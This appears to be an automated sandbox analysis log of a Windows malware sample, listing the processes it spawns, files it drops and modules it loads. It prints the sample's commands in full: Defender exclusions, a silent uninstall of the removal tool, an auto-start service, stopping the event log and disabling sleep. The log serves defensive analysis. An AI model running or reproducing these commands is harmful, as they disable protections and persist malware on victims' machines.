Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu1gyz51.jvf.ps1
Source: rtYpMDeKUq.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" (this query is repeated 17 times in the report)
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rtYpMDeKUq.exeReversingLabs: Detection: 65%
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeFile read: C:\Users\user\Desktop\rtYpMDeKUq.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\rtYpMDeKUq.exe "C:\Users\user\Desktop\rtYpMDeKUq.exe"
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "TASJBGYW"
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "TASJBGYW"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "TASJBGYW"Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "TASJBGYW"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: rtYpMDeKUq.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: rtYpMDeKUq.exeStatic file information: File size 2629632 > 1048576
              Source: rtYpMDeKUq.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
              Source: rtYpMDeKUq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp
              Source: rtYpMDeKUq.exeStatic PE information: section name: .00cfg
              Source: lzsbffridksl.exe.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: 0_2_00007FF75E8E1394 push qword ptr [00007FF75E8EB004h]; ret 0_2_00007FF75E8E1403
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: 24_2_00007FF6CD201394 push qword ptr [00007FF6CD20B004h]; ret 24_2_00007FF6CD201403
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 push qword ptr [0000000140009004h]; ret 35_2_0000000140001403

              Persistence and Installation Behavior

              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe File created: C:\Windows\TEMP\jvocdauqvwbp.sys
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe File created: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe File created: C:\Windows\Temp\jvocdauqvwbp.sys
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe File created: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe File created: C:\Windows\Temp\jvocdauqvwbp.sys
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "TASJBGYW"

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
